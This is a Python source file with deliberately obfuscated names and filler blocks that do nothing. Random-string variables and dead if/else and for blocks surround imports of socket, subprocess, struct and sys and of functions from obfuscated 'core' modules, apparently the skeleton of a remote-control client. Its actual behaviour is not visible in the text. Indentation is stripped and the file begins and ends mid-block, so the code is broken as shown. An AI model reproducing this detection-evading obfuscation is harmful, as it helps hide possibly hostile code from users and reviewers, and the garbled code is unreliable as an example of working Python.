xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = FjRNtSCJtxQIHzHCBANyvSDFfkHSAoEHzzByCQCtzEQRIPEGztHSpPBmIAjBJFF
else:
xJOxLDDlmqmAmyPHrDJSJSCFCitymFVQqvFBFDBBwPwBRrEWwWhuIHFHJqsCGBg = JGVSPRGBFsIFoozrXsVmAuRCtkGmrxAJLHBNJQNXmywOzWCRIqdwHfHAVRNRhcH
# -*- coding: utf-8 -*-
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
if AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ != GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi:
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'jPxxzVnpBGycGxGSBtHAPNSRiJCyTgJFuoGRDwjOFZeDAhPuMHtEzAQjnIIHqXj'
GlCHfIBuGpDHwRZBDAJErEJJvuQvCJoqkHqVVetCypAJSvFIRQdEESBEvnFqYxi = AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ
AyyJNDoAGAIUSBzoEBDRSsBuCQTuqPIbuzzIsQenGzdCJuSRAsvpkjkkHRxNHEJ = 'tpFzvBWpzIwQzkwSGKFyEHBmEHerSCRIDrDDGHAQuRvSzJtMEYIPJHiGLxrVIBF'
import socket
qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv = 'rEFtxByMzxySSqpGPrHPARJNFXPAHIvBEyxzJWCDSFFFeQYzPRuOJvWRtGOEIkC'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
if qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC == OJnLJCRyyIqvmzsGqwOymvRASgstGSHytRrxDrDrDwAEHRrpaksBnfQRySIzPzv:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = qSHTUIGyrrzAZSuGsyvWJRiuJSlMFiursJPnAIsRRHtCAIpEFpivlUyzPPOIkHC
else:
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'XDnRxJyrSMiDmmEEQpwcRDzyVMImOCyozwxEFJBHDGnFJHSGxuvrtuPzyIJQFWz'
GFYQPqpCIuGDxVuRVEyVPJQxSIPCWzuIRHUGGiSsSflZjOvuySsIyVqxQxoGGWj = 'rpIyDHGDZCcJGACzGNUjOjHhzGxzGDSypkrQFFsxBjHJANOnxAHAnDGrECiwFgD'
import subprocess
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
if JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq != uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP:
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'uvSDQDBGEBFqkyRNnnFRqDGyOSRloHfGRbJxMJwDrPOiuuwWyCAFrICEuDCMYvx'
uSouClnmuwtgPJZKVJJJDCXRrutOSiQSAwVrCwQqSDkxEkNPmGqQhRJJISnSJxP = JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq
JSzCSDWEJIDymqnQSyOJOzgXouJzPzPGSpRfySPyCeBGPzfJEzQveMtJFuTonMq = 'iwCpAIRHOhOClFOQABQPxSWmBGItrDODGntZwJEtHOJIpXOwxxErCJvPBQupwBw'
import struct
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
if JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts != oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw:
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'iwBHjuJQUflzCAkSoRayDPpACdQFbhSQZDLNHJXYImoiGoIIhRYyPBFzXuohBIR'
oiJoINSwBDtLHCAEDHYSHJvGvPPHecAEIEDAjqkqASOyyCHxzGDSSGwHvAxGEQw = JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts
JBSLEPRAvQAFRizRBKCEYDppGJSJFHIpHyUIUoxAHIjtXItcSzJAzczwIJqHTts = 'KCtPJwmOCDoTVmwxGQJuYSqnFAHlOStzsByoVuQjPEvFutnAvQDzIPGGIQuESxz'
import sys
oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr = 'BFzDqIrFwIEFNqGCSuFBNzmDyrHFHlBGMCEZJzOvkPBqxjVEexyzDzNSOEqcytR'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
if oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw == GdvXfIsyXwxJuIJSuCEFfXxztCqHDBDIDVjkSTWTXGJDxRRpESlASNsRLOorjRr:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = oqINBvBCuqZIDHFnVsSMPpFEEqAXzNHQPCtwytSUEvkkFboHPBGQrjAGnlOrHuw
else:
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RrWauTNuuqNFDSlReixvOEErSzQwDtzHgsUyUAqxkBjBUdMrHmAwDvxRQzEfGQN'
wsXsrIQHjSeCRsHvFIFnAvvIuzRxOYLFiGUCzoRqDGOgHHGjDZHuGQePrrzRGtZ = 'RRwGSASPTBCzJQruFMNCqfqFaGQfRoluUnMYNmGnOGBSEgnrOvRmRBaStwvRCPi'
try:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
if uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ != vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn:
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'sFByRmIuUpJDewYrbvHxnJIsEWCJEwRJCFIvHeqCzwezLECJqepuowzhuIvNSCu'
vRVMhtvCPyzPCJDOzTqQyHyFNXBGGoPYrAyNitCwCSfwkBSkDQCxnBvzDRpJYJn = uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ
uEESCwtPySzsERHPvJxvtIRNgVMytIPCJuWJHPADINRQHHwzYFIHzAPyIyBmEqJ = 'AxmxiumQAFHGgWRTPNOOCWSpzJHPSFtzPJRFnnPoMZERgJCluuIvyyEmRFGJoBP'
from core.mlRSHnORJEINxGsriAJHTYHTPRECHHXCEJyGqrsOxjXFuEYyCypFDxmBgyzHeeR import uSIByGHznHHkkvwwPIVnIDFmmvPIHMRIyINSxzREPRIJQsuHBAIBMOtBQvIltFA, SPuftCNRrBmEOHCGpJsNAREOsyuxkCNDSBrSxGriSZOARHCTADxEyFHFPgOgFtg, vtMRvNIZLQjyJnDNOMACSDDwRCSJsDWOiDOCIESrasNPSuqDRsJHTwoEvItFRqw
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = 'DXFYzLoSNrnpOIHygzGHvQxDUmRwCAfuFRHCpnoHCzDGBGJDSRJJGMItQFePIvd'
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = 'cxIEAGnVCYFEpCztxNhVwuwyTYCArNpuzAxvppCQIxECPJJSSozNRIrlORyYFxE'
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = 'tSIUjAARBvfnIdruXHANvSJRgteCDICAYGIIePByDHRDOzhkFCNpeGRDJyOiUCB'
pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz = 'qGjSzLmgyoqsERyIREfXlqBeGPTHZQHgSySySRGDmNyLpIHDPYOmQSuPEIBCzpw'
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = 'JMPjSiPGFEoBSIQFsiJYMRBSdGxpGUAFhFSyBAuRCErFyDItFBFOhESIEPNPJm'
QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD = 'JEEqpDtqMJGMFzNISmGVBFSTlyXSDIOMWGQEHIRuNQsPIfoJhsORFwpzRGYnHws'
if CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH != pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in pGPkNzMBHykwZqEEFBgIFysFjTuqySGroEMxNHDHQAAuzCgCSDAsJCstJSIoSmz:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD != EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF = RPuXtRSMDSrklwCrDwHQyzqwiJHytDMAtBRCFGCpCEnOuCtoHYlbOSAEAJzhVhF
else:
JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
if EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf == CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
for QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD in CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH:
if QXkyOFRuQFrIGHvGBQIzJSQthCuGIxFZxsvGvJGHYmyAuDqAWAIQhNPPOZQyADD == EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = CPRJjOxjNwADnDSNHHxlBNuGPzABjyBkyRsJSsABRRyBANDGRLutxtkXMRGuzeH
else:
EMJJQjNERWGwHNrZpxiZtJHpOtHAkWQHlDSvDwRxJsAompDjoJIGSEkJltFoGVf = JZWsPIIgkJwPhAZJQCWHSdCsJFzpQxpPBIlHkQIPJZAxqDSwzwIRZkFGZszxFDS
from core.GDBuGjtzDtAHlDJHwyDFJHNFQRIzdBRqORcFFxozwRRvCDdBHFDPIFSjpTysrjO import vIRwVSrRIoGDyAzHuoJjtNEGPQATAHFuAoCIjSvXYCAHcDGzOHiuVDIDtwoJGpy, kyvylzQylABvsJoPANuHBJzJofEFAOEIIiJpCEDRxoQNolMqHtFCHxSyBSrFSCC
try:
CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG = 'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw'
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = 'GFBCoZBzQWRzGJAZHrqRSDtXLUSuAvrtnrJGBZzwIAvrPryfWHGDHSXtVDwxpoE'
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = 'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy'
IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR = 'jYBPkZBwSJlOTPUdRGhUJoEjEHHHJxuOzTHwuNTTxRmHsFoxBmnrOtJuuCPGYt'
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = 'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt'
ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE = 'vSjqPGJzXuFxPECGAAuxIivVryxzmNxzsQGttPODSzROIJXByPXDwDGIPkDGzGo'
AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD = [
'DnQxrAWDuGnETunGOyqRePnHIyoISMxNBuVYEYJAHADXtIFvIOAnuntFMSdhwHw',
'HORmRESSBFAoIpvuDgDwJWImDSCHSGmOTGvsIlyRBzCwFCgZPuPSDwoHjRPNrGy',
'JqEwTQmvptDCJTAtqAtqzMufBuAREFuFIBqpvuIvFArwLBIAuSrDpQQuiyLJBJt',
'FFySBiaROmFYyHMGFkNTPgRPHkxYJSEpwkYjiIBEtAZrFIQvEAvhjxQFBDSJRMl'
]
for CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG in ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE:
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB:
if IJvzRrSRlCGoHDCvRACTJRoSrnYPFPVICiyzIxHJknxrPQouDJWyRneSIqGsBrR == psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = CvxCCiGFDyGRCOvjFJgXRoIFSJujyDlzpUEtYlgsyHIjRDpnkPHykeXzPsmUyG
elif psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR == LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv:
LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
else:
psHblWwExvuJKJKqeuMpUSKpufHIHHzzBSrDBCMzFNUjYLUVuPkDEPMwQjGDQCR = ExrrtXQmJnHEuAUSJPjFJfSyoRGGSRWyGExyKRIPuJuuBFCsVIHHUEQRgIRGOzE
for LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv in AjRJAJMHzKxkUHQuBxQISHDsYyMSvOFBcEQjoxqAEGtmmyCsFEBlEMADyBviGxD:
PAPSPmADIpzpvAwjRxDBnHPICnxQzjHQuFbgQSzHxmNyYGPmGLwIzEMQtFmjSXB = LHTnGFrzzCGQJIwASGlzRhmJZNnQkLFJyzBCoGuGsDwFHsSDFuzSERtuylQzinv
except Exception:
pass
from core.GEnMoqyyUuvxIDthAUEBVJIqDBEBXGAIHQeiUjsBHwSGDFHmysGkCyGRwQClFDE import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
if CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt != hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw:
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'KBSliMqNRECCTNQsGOxkFnGtyIZTsxeToJMHhSBRPIPpZWERmRNppSSRYIIvqt'
hlHRIBjmtrDRADIDzPvJFCFhIiDASyCRCwAOqtytMAOBRSvyzqCfBIXuAIjWzsw = CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt
CuPCCFSPRNErJQytGjGoCDsCyQCXwAvxoEtGDJzIQslAAwwJSAQwHBOERZRsjyt = 'mcBwPHgEzoQYEQGzAIDDNGuzGzujRQSJQASoRrmOwQDAxBWqkwFwEmSkCHnDknC'
from core.xMPjIiIPERPCuRrUryvQHyYqqrRGnXzziqxujxkWElGFIQBpyPhzJCPRRQIHQw import HCEwqSIvzuVuOsqtHkJSBDxBGyvADGEjjJGIDlvrESExqlHvSQSszJEkDPJGOBQ
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = 'IPGzINsnUSQMFwPIPpHeDazBsuRiRMWouOtSeeyySTrvIsRUtHiQYBGrIZkPrBx'
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = 'BuvJRRKHUyHIxIxDGQvRpJCwnRRpItCbAsetFYIvvYsJIBzUAvHMIynnqDOGDRF'
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = 'ArszGIACFSzvXmMHJQCPuHFyFCOTSFBZzHCkhjCNQEHMqDjyQoJaxSGxCHCCGlS'
HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB = 'kIlxMyOGZHTzgfyvSHBFqIsVIzJBjrAFEPITyIqZIZDoERTEjwTvFICBSBHGASP'
xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN = 'yFayRNgJgvOHtzRFFSpFsGePwxMCGjJISQWDCrHERPhuwSWJCQJDZvMwAsPruHv'
if nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
if zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = HTEQmsDDCtyDxCuCAISEUHGpFzIDwSqOesfAEtzysVgBpJEMFpCDqHGkwnBwxB
elif zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE in nyOxEJxDBPQJwMGiHzMDTwszQGFAFuJDmBGuSOJPQizGrJvHJGPoxIwCPGuIDji:
FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH = zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE
if FGyqEbELuzvTeFztxwDvwmDPtBpmBtDGGIRtGrBRBSEoSBJGNOECVItIOytyQfH in zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE:
zeVHIhvOkDCRIHiRyjhSIRQRcmnADSXGYICpFyPjklyIJHzVqGStzICFOzQRzzE = xHpizJHFQvvTJRQTSJPQxSHDGCtOJSvISsmPnFzYvGHHKNSIvsqSrRCSQotmkMN
from core.GUHQyNzYwxRHRrtOBrXpxJsOZwCyrSGeJTPwVlAmmpwxqPIASTSRPRISEGtuyIP import GuHDlyvuyMYuBAOtBAoPLYEGnaoPxOQUqfGYkfnEGXzwIHOCMmuuwFjwmqQQFVu
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = 'UQsvBxSGqyPtYoEHCNmCJcaePvOCHPkMJvHEztSJguuJIIuXJwOhBYHCUCRZwSl'
SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI = 'xCzFNtvvRYiqwfDAtwvmSElAOtJCoFSETpGMIHEJrWPiJCOCtIuSOEJHgoCmrIv'
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'CDkozkqNQAymGCEzzQSwvSHPQwOItyDUIHDewZsvIZwCDzGDYgtmIMJjsAqvHEf'
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = 'YPynqCIeRqPCCRCmuxoCrAnYBmEHsBBuHFOSSJHrQYvrrCzQJtevGRQCEIFOzBn'
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw:
for IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw = SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL:
for DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL in SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
if GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx == SFuSAQSzrIZQJmyLOFFUhnyzIxEGsiHOANGQPtkuUwvPCDEGtJTqCPODHqGMnHI:
DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL = 'GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx'
elif DvUuJFClABGCETRmVGFOIGpHJERjkzrYHSNEuAeTFGCGxBJylztDEvSBRzMxclL == GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx:
GtAFntGyQBJQzyRJoOACIDIiAIGtRyEwpwtnDypxAyvTEpuPAjYCNsCHIutDmUx = IOEvzClwyRBCBCQeJgtqCoVBPIvnFNNBiEODtqzqxlIBMZqamFEfRsiOXDHxtPw
else:
